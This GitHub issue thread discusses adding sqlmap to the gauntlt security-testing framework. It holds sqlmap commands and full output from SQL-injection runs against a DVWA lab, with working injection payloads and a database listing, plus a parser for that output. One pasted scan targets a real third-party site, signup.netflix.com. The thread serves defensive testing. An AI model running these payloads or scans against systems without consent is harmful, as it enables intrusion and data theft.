
Add sqlmap to gauntlt #4

Closed
wickett opened this Issue Jun 21, 2012 · 4 comments

4 participants
Owner

wickett commented Jun 21, 2012

Implement sqlmap for gauntlt so that it can be called via gauntlt steps.

@ghost ghost assigned wickett and matt-tesauro Jun 21, 2012

@royrapoport royrapoport was assigned Aug 11, 2012

Contributor

bowsersenior commented Aug 11, 2012

Hi Roy,

As we talked about yesterday, I am assigning you some issues. It would be great if you could come up with some sqlmap examples. You don't need to make them work with gauntlt. Just some shell commands that you find useful. Not sure how familiar you are with sqlmap or how willing you are to learn more about it. Let me know if you'd like me to re-assign.

Thanks,
Mani

Member

royrapoport commented Sep 9, 2012

OK, so here's where we are. Apologies for the potentially-bad typing -- I cut the HECK out of my thumb and there's a big bandage wrapped around it.

Generally speaking, sqlmap isn't really meant as a "just point it at your website and have it do its magic" sort of tool. It requires some care in defining the options required for running, and has tons of additional options.

I used DVWA (Damn Vulnerable Web Application) to generate this; this ended up being similar to most of the examples you'll find out there if you do searches on "sqlmap dvwa."

Let's start with a basic scan:
./sqlmap.py --url "http://10.211.55.4/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=esuneq9r11kd98efafmqqtoli7" --string="Surname" --batch

The URL is required (there are other ways to feed sqlmap a target, but I'm using this one). The cookie is not required in general (but is required in this case); the --string is optional; --batch just means it won't ask questions. We should use --batch.

Notice that this essentially performs a GET on a form submission; you can also post, using a different command-line option.

Here's the output from the vulnerable application:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:45:01

[23:45:01] [WARNING] skipping purging of directory '/Users/rrapoport/Downloads/sqlmapproject-sqlmap-f26ea04/output' as it does not exist
[23:45:01] [INFO] testing connection to the target url
[23:45:01] [INFO] testing if the provided string is within the target URL page content
[23:45:01] [INFO] testing if GET parameter 'id' is dynamic
[23:45:01] [INFO] confirming that GET parameter 'id' is dynamic
[23:45:01] [INFO] GET parameter 'id' is dynamic
[23:45:01] [INFO] heuristics detected web page charset 'ascii'
[23:45:01] [WARNING] reflective value(s) found and filtering out
[23:45:01] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: MySQL)
[23:45:01] [INFO] testing for SQL injection on GET parameter 'id'
[23:45:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:45:01] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[23:45:01] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:45:01] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[23:45:01] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:45:01] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:45:12] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable
[23:45:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[23:45:12] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
[23:45:12] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[23:45:12] [INFO] target url appears to have 2 columns in query
[23:45:12] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[23:45:12] [INFO] GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

sqlmap identified the following injection points with a total of 25 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9686=9686 AND 'khJJ'='khJJ&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 9639 FROM(SELECT COUNT(*),CONCAT(0x3a6a63783a,(SELECT (CASE WHEN (9639=9639) THEN 1 ELSE 0 END)),0x3a6e6c613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dyRj'='dyRj&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' LIMIT 0,1 UNION ALL SELECT CONCAT(0x3a6a63783a,0x62477750545953714c63,0x3a6e6c613a),NULL#&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'PoxG'='PoxG&Submit=Submit

[23:45:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
[23:45:12] [INFO] fetched data logged to text files under '/Users/rrapoport/Downloads/sqlmapproject-sqlmap-f26ea04/output/10.211.55.4'

[*] shutting down at 23:45:12

Notice the line containing "sqlmap identified the following injection points" and "[23:45:12] [INFO] GET parameter 'id' is vulnerable." Both of these indicate we found a vulnerability.

If we wanted to run the same command but add '--dbs', we'd get:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:46:22

[23:46:22] [INFO] resuming back-end DBMS 'mysql'
[23:46:22] [INFO] testing connection to the target url
[23:46:22] [INFO] testing if the provided string is within the target URL page content

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9686=9686 AND 'khJJ'='khJJ&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=1' AND (SELECT 9639 FROM(SELECT COUNT(*),CONCAT(0x3a6a63783a,(SELECT (CASE WHEN (9639=9639) THEN 1 ELSE 0 END)),0x3a6e6c613a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dyRj'='dyRj&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=1' LIMIT 0,1 UNION ALL SELECT CONCAT(0x3a6a63783a,0x62477750545953714c63,0x3a6e6c613a),NULL#&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'PoxG'='PoxG&Submit=Submit

[23:46:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL 5.0
[23:46:22] [INFO] fetching database names
[23:46:22] [WARNING] reflective value(s) found and filtering out
available databases [5]:
[*] dvwa
[*] information_schema
[*] mysql
[*] performance_schema
[*] test

[23:46:22] [INFO] fetched data logged to text files under '/Users/rrapoport/Downloads/sqlmapproject-sqlmap-f26ea04/output/10.211.55.4'

[*] shutting down at 23:46:22

Notice the line starting with "available databases [5]:" after which it actually shows you what DBs are on the box. Scary.

Compare this to running against a non-vulnerable target:

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:47:30

[23:47:31] [INFO] testing connection to the target url
sqlmap got a 302 redirect to 'https://signup.netflix.com/'. Do you want to follow? [Y/n]
[23:47:33] [ERROR] user aborted

[*] shutting down at 23:47:33

2611 lglt-tudang sqlmapproject-sqlmap-f26ea04> ./sqlmap.py --url "http://signup.netflix.com?username=rrapoport&password=foo" --batch

sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:47:36

[23:47:36] [INFO] testing connection to the target url
[23:47:36] [INFO] sqlmap got a 302 redirect to 'https://signup.netflix.com/'. Do you want to follow? [Y/n] Y
[23:47:38] [INFO] heuristics detected web page charset 'None'
[23:47:39] [INFO] testing if the url is stable, wait a few seconds
[23:47:40] [INFO] heuristics detected web page charset 'ascii'
[23:47:40] [WARNING] GET parameter 'username' appears to be not dynamic
[23:47:41] [WARNING] heuristic test shows that GET parameter 'username' might not be injectable
[23:47:41] [INFO] testing for SQL injection on GET parameter 'username'
[23:47:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:47:47] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:47:49] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:47:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:47:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:47:53] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:47:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:47:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:47:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:47:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:47:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:48:00] [INFO] testing 'Oracle AND time-based blind'
[23:48:01] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:48:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:48:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using the --dbms option

[23:48:38] [WARNING] GET parameter 'username' is not injectable
[23:48:38] [WARNING] GET parameter 'password' appears to be not dynamic
[23:48:39] [WARNING] heuristic test shows that GET parameter 'password' might not be injectable
[23:48:39] [INFO] testing for SQL injection on GET parameter 'password'
[23:48:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[23:48:44] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[23:48:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[23:48:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[23:48:47] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[23:48:49] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[23:48:50] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[23:48:51] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[23:48:52] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[23:48:53] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[23:48:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[23:48:57] [INFO] testing 'Oracle AND time-based blind'
[23:48:58] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[23:49:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[23:49:40] [WARNING] GET parameter 'password' is not injectable
[23:49:40] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
[23:49:40] [WARNING] HTTP error codes detected during testing:
405 (Method Not Allowed) - 320 times

[*] shutting down at 23:49:40

Note the last [CRITICAL] line.

What other information would you like me to provide?

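An added example, not code from gauntlt, sqlmap, or anyone in this thread: a small Ruby parser that reads sqlmap's console output and turns the markers Roy points out above ("sqlmap identified the following injection points", "available databases [N]:", "[CRITICAL] all tested parameters appear to be not injectable") into a verdict a test step can assert on. The sample inputs are constructed from excerpts of the runs pasted in this thread; the line wording is assumed to match sqlmap 1.0-dev of that era, and later versions may phrase some lines differently.

```ruby
# Added example for this thread (not gauntlt's or sqlmap's code): parse sqlmap
# console output into a verdict. Assumes the 1.0-dev output wording pasted above.

SqlmapVerdict = Struct.new(:injectable, :parameters, :techniques, :payloads,
                           :dbms, :databases, :http_errors, :aborted)

LOG_PREFIX = /\A\[\d{2}:\d{2}:\d{2}\] \[(?:INFO|WARNING|ERROR|CRITICAL|DEBUG)\] /

def parse_sqlmap_output(text)
  v = SqlmapVerdict.new(false, [], [], [], nil, [], {}, false)
  place = nil
  in_db_list = false

  text.each_line do |raw|
    line = raw.chomp
    msg  = line.sub(LOG_PREFIX, '')        # drop "[23:45:12] [INFO] " when present

    in_db_list = false if msg.strip.empty? # the database list ends at the blank line

    case msg
    when /\Asqlmap identified the following injection points/
      v.injectable = true                  # printed on a fresh run and on a resumed session ("0 HTTP(s) requests")
    when /\APlace: (\S+)/
      place = $1                           # GET, POST, Cookie, ...
    when /\AParameter: (\S+)/
      name = "#{place}:#{$1}"
      v.parameters << name unless v.parameters.include?(name)
    when /\AType: (.+)/
      v.techniques << $1 unless v.techniques.include?($1)
    when /\APayload: (.+)/
      v.payloads << $1
    when /\Athe back-end DBMS is (\S+)/
      v.dbms = $1
    when /\Aavailable databases \[\d+\]:/
      in_db_list = true
    when /\A\[\*\] (\S+)/
      v.databases << $1 if in_db_list      # "[*] dvwa"; ignores "[*] starting at ..." lines
    when /\Aall tested parameters appear to be not injectable/
      v.injectable = false
    when /\A(\d{3}) \([^)]*\) - (\d+) times/
      v.http_errors[$1.to_i] = $2.to_i     # "405 (Method Not Allowed) - 320 times"
    when /\Auser aborted/
      v.aborted = true                     # an interactive prompt was hit, i.e. --batch was missing
    end
  end
  v
end

# Constructed samples: excerpts of the runs pasted in the thread above.
VULNERABLE_RUN = <<~OUT
  [23:45:12] [INFO] GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N

  sqlmap identified the following injection points with a total of 25 HTTP(s) requests:

  Place: GET
  Parameter: id
  Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: id=1' AND 9686=9686 AND 'khJJ'='khJJ&Submit=Submit

  Type: UNION query
  Title: MySQL UNION query (NULL) - 2 columns
  Payload: id=1' LIMIT 0,1 UNION ALL SELECT CONCAT(0x3a6a63783a,0x62477750545953714c63,0x3a6e6c613a),NULL#&Submit=Submit

  [23:45:12] [INFO] the back-end DBMS is MySQL
  [23:46:22] [INFO] fetching database names
  available databases [5]:
  [*] dvwa
  [*] information_schema
  [*] mysql
  [*] performance_schema
  [*] test

  [*] shutting down at 23:46:22
OUT

CLEAN_RUN = <<~OUT
  [23:49:40] [WARNING] GET parameter 'password' is not injectable
  [23:49:40] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
  [23:49:40] [WARNING] HTTP error codes detected during testing:
  405 (Method Not Allowed) - 320 times

  [*] shutting down at 23:49:40
OUT

if __FILE__ == $PROGRAM_NAME
  [VULNERABLE_RUN, CLEAN_RUN].each do |run|
    v = parse_sqlmap_output(run)
    puts "injectable=#{v.injectable} params=#{v.parameters} dbms=#{v.dbms} " \
         "dbs=#{v.databases} http_errors=#{v.http_errors} aborted=#{v.aborted}"
  end
end
```

Run sqlmap with --batch, capture its stdout, and hand the text to parse_sqlmap_output. The parser keys on the "sqlmap identified the following injection points" header rather than on the request count, because a resumed session (the second run above) reprints the injection points with "0 HTTP(s) requests". A "user aborted" line means sqlmap stopped at a prompt, which in an unattended test run is a harness bug, not a clean result.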
Contributor

bowsersenior commented Sep 11, 2012

Thanks for your help @royrapoport ! This is very good info. I'll use this to add a sqlmap cuke to gauntlt to get people started. We need to get some input from some veteran sqlmap users on this at some point in order to make it better.

@bowsersenior bowsersenior was assigned Sep 11, 2012

Contributor

bowsersenior commented Sep 16, 2012

To finish this particular issue, I will use scapegoat to create a simple web page with a form input that is vulnerable to SQL injection. Then the tests for gauntlt can run SQLMAP against the page by starting scapegoat during the test run. This will be the first attack adapter that is tested with scapegoat.
